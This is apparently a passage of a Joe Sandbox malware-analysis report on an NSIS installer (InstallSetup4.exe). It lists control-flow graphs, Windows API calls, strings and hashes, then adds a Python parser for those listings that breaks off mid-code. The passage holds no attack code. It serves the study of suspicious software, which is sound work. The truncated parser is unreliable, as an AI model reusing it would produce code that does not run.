                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 606308-861673476
                                                                                            • Opcode ID: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
                                                                                            • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                            • Opcode Fuzzy Hash: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
                                                                                            • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 222 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 225 4030d2-4030d7 222->225 226 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 222->226 227 4032b2-4032b6 225->227 234 403110 226->234 235 4031f5-403203 call 40301e 226->235 237 403115-40312c 234->237 241 403205-403208 235->241 242 403258-40325d 235->242 239 403130-403139 call 4034d4 237->239 240 40312e 237->240 248 40325f-403267 call 40301e 239->248 249 40313f-403146 239->249 240->239 244 40320a-403222 call 4034ea call 4034d4 241->244 245 40322c-403256 GlobalAlloc call 4034ea call 4032b9 241->245 242->227 244->242 268 403224-40322a 244->268 245->242 273 403269-40327a 245->273 248->242 253 4031c2-4031c6 249->253 254 403148-40315c call 406002 249->254 258 4031d0-4031d6 253->258 259 4031c8-4031cf call 40301e 253->259 254->258 271 40315e-403165 254->271 264 4031e5-4031ed 258->264 265 4031d8-4031e2 call 406a38 258->265 259->258 264->237 272 4031f3 264->272 265->264 268->242 268->245 271->258 277 403167-40316e 271->277 272->235 274 403282-403287 273->274 275 40327c 273->275 278 403288-40328e 274->278 275->274 277->258 279 403170-403177 277->279 278->278 280 403290-4032ab SetFilePointer call 406002 278->280 279->258 281 403179-403180 279->281 285 4032b0 280->285 281->258 282 403182-4031a2 281->282 282->242 284 4031a8-4031ac 282->284 286 4031b4-4031bc 284->286 287 4031ae-4031b2 284->287 285->227 286->258 288 4031be-4031c0 286->288 287->272 287->286 288->258
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00403093
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,00000400), ref: 004030AF
                                                                                              • Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 0040604B
                                                                                              • Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 004030FB
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00403231
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup4.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                            • API String ID: 2803837635-3807918781
                                                                                            • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                            • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                            • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                            • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 353 4032b9-4032d0 354 4032d2 353->354 355 4032d9-4032e2 353->355 354->355 356 4032e4 355->356 357 4032eb-4032f0 355->357 356->357 358 403300-40330d call 4034d4 357->358 359 4032f2-4032fb call 4034ea 357->359 363 4034c2 358->363 364 403313-403317 358->364 359->358 365 4034c4-4034c5 363->365 366 40346d-40346f 364->366 367 40331d-403366 GetTickCount 364->367 370 4034cd-4034d1 365->370 368 403471-403474 366->368 369 4034af-4034b2 366->369 371 4034ca 367->371 372 40336c-403374 367->372 368->371 373 403476 368->373 376 4034b4 369->376 377 4034b7-4034c0 call 4034d4 369->377 371->370 374 403376 372->374 375 403379-403387 call 4034d4 372->375 378 403479-40347f 373->378 374->375 375->363 387 40338d-403396 375->387 376->377 377->363 385 4034c7 377->385 382 403481 378->382 383 403483-403491 call 4034d4 378->383 382->383 383->363 390 403493-40349f call 4060f9 383->390 385->371 389 40339c-4033bc call 406aa6 387->389 395 4033c2-4033d5 GetTickCount 389->395 396 403465-403467 389->396 397 4034a1-4034ab 390->397 398 403469-40346b 390->398 399 403420-403422 395->399 400 4033d7-4033df 395->400 396->365 397->378 403 4034ad 397->403 398->365 401 403424-403428 399->401 402 403459-40345d 399->402 404 4033e1-4033e5 400->404 405 4033e7-40341d MulDiv wsprintfW call 4055dc 400->405 407 40342a-403431 call 4060f9 401->407 408 40343f-40344a 401->408 402->372 409 403463 402->409 403->371 404->399 404->405 405->399 413 403436-403438 407->413 412 40344d-403451 408->412 409->371 412->389 414 403457 412->414 413->398 415 40343a-40343d 413->415 414->371 415->412
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: *B$ A$ A$... %d%%
                                                                                            • API String ID: 551687249-3485722521
                                                                                            • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                            • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                            • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                            • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 416 401774-401799 call 402dab call 405e9d 421 4017a3-4017b5 call 406557 call 405e26 lstrcatW 416->421 422 40179b-4017a1 call 406557 416->422 427 4017ba-4017bb call 406805 421->427 422->427 431 4017c0-4017c4 427->431 432 4017c6-4017d0 call 4068b4 431->432 433 4017f7-4017fa 431->433 441 4017e2-4017f4 432->441 442 4017d2-4017e0 CompareFileTime 432->442 435 401802-40181e call 406047 433->435 436 4017fc-4017fd call 406022 433->436 443 401820-401823 435->443 444 401892-4018bb call 4055dc call 4032b9 435->444 436->435 441->433 442->441 445 401874-40187e call 4055dc 443->445 446 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 443->446 458 4018c3-4018cf SetFileTime 444->458 459 4018bd-4018c1 444->459 456 401887-40188d 445->456 446->431 478 401869-40186a 446->478 460 402c38 456->460 462 4018d5-4018e0 FindCloseChangeNotification 458->462 459->458 459->462 466 402c3a-402c3e 460->466 463 4018e6-4018e9 462->463 464 402c2f-402c32 462->464 467 4018eb-4018fc call 406594 lstrcatW 463->467 468 4018fe-401901 call 406594 463->468 464->460 474 401906-4023a7 call 405bb7 467->474 468->474 474->464 474->466 478->456 480 40186c-40186d 478->480 480->445
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Installed,Installed,00000000,00000000,Installed,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017DA
                                                                                              • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                              • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                              • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                             Memory Dump Source
                                                                                             • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$Installed$SOFTWARE\BroomCleaner
                                                                                            • API String ID: 1941528284-2703293957
                                                                                            • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                            • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                            • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                            • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 482 4068db-4068fb GetSystemDirectoryW 483 4068fd 482->483 484 4068ff-406901 482->484 483->484 485 406912-406914 484->485 486 406903-40690c 484->486 488 406915-406948 wsprintfW LoadLibraryExW 485->488 486->485 487 40690e-406910 486->487 487->488
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                            • wsprintfW.USER32 ref: 0040692D
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                             Memory Dump Source
                                                                                             • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                            • API String ID: 2200240437-1106614640
                                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 489 4020dd-4020e9 490 4021a8-4021aa 489->490 491 4020ef-402105 call 402dab * 2 489->491 492 4022f6-4022fb call 401423 490->492 501 402115-402124 LoadLibraryExW 491->501 502 402107-402113 GetModuleHandleW 491->502 498 402c2f-402c3e 492->498 504 402126-402135 call 4069ba 501->504 505 4021a1-4021a3 501->505 502->501 502->504 508 402170-402175 call 4055dc 504->508 509 402137-40213d 504->509 505->492 514 40217a-40217d 508->514 510 402156-40216e 509->510 511 40213f-40214b call 401423 509->511 510->514 511->514 522 40214d-402154 511->522 514->498 517 402183-40218d call 403bc9 514->517 517->498 521 402193-40219c FreeLibrary 517->521 521->498 522->514
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402108
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                              • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                              • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                             Memory Dump Source
                                                                                             • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                            • String ID: Xj
                                                                                            • API String ID: 334405425-403292392
                                                                                            • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                            • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                            • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                            • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 523 405f2e-405f49 call 406557 call 405ed1 528 405f4b-405f4d 523->528 529 405f4f-405f5c call 406805 523->529 530 405fa7-405fa9 528->530 533 405f6c-405f70 529->533 534 405f5e-405f64 529->534 536 405f86-405f8f lstrlenW 533->536 534->528 535 405f66-405f6a 534->535 535->528 535->533 537 405f91-405fa5 call 405e26 GetFileAttributesW 536->537 538 405f72-405f79 call 4068b4 536->538 537->530 543 405f80-405f81 call 405e72 538->543 544 405f7b-405f7e 538->544 543->536 544->528 544->543
                                                                                            APIs
                                                                                              • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                            • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                                                                            • GetFileAttributesW.KERNEL32(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                             Memory Dump Source
                                                                                             • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 3248276644-263117582
                                                                                            • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                            • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                            • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                            • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 546 406076-406082 547 406083-4060b7 GetTickCount GetTempFileNameW 546->547 548 4060c6-4060c8 547->548 549 4060b9-4060bb 547->549 550 4060c0-4060c3 548->550 549->547 551 4060bd 549->551 551->550
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00406094
                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                             Memory Dump Source
                                                                                             • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-2113348990
                                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 552 4015c6-4015da call 402dab call 405ed1 557 401636-401639 552->557 558 4015dc-4015ef call 405e53 552->558 560 401668-4022fb call 401423 557->560 561 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 557->561 566 4015f1-4015f4 558->566 567 401609-40160c call 405b05 558->567 573 402c2f-402c3e 560->573 561->573 577 401660-401663 561->577 566->567 571 4015f6-4015fd call 405b22 566->571 574 401611-401613 567->574 571->567 582 4015ff-401602 call 405aab 571->582 578 401615-40161a 574->578 579 40162c-401634 574->579 577->573 583 401629 578->583 584 40161c-401627 GetFileAttributesW 578->584 579->557 579->558 587 401607 582->587 583->579 584->579 584->583 587->574
                                                                                            APIs
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                              • Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 00401652
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401645
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 1892508949-3067928993
                                                                                            • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                            • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                            • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                            • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
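The per-function listings above all share one shape: a control_flow_graph edge list, the APIs resolved in that function (direct calls plus "Part of subcall function" entries), the referenced strings and the fuzzy hashes. In a report this long it is quicker to parse those blocks and pivot on an API name than to scroll, for instance to find the function that writes the registry with RegSetValueExW, or the one at 4068db that formats "%s%S.dll" onto the GetSystemDirectoryW result and passes flag 8 (LOAD_WITH_ALTERED_SEARCH_PATH) to LoadLibraryExW, i.e. loads UXTHEME by absolute system path rather than by bare name. The Python below is an added example, not part of the Joe Sandbox report or the analysed sample: it parses three blocks excerpted (and trimmed) from this page as a constructed sample, and the capability tags are this example's own heuristic, not a Joe Sandbox field.

```python
# Parse Joe Sandbox per-function listings (control_flow_graph / APIs / Similarity
# blocks) into a structure that can be filtered by API name or referenced string.
# Added example for this report page; CAPABILITY_TAGS is my own heuristic.
import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function <addr>: " prefix, then
# <api>.<MODULE>(<args>), ref: <addr>  (the argument list may be absent).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# Heuristic API -> capability map (assumption of this example, not Joe Sandbox's).
CAPABILITY_TAGS = {
    "RegSetValueExW": "registry-write",
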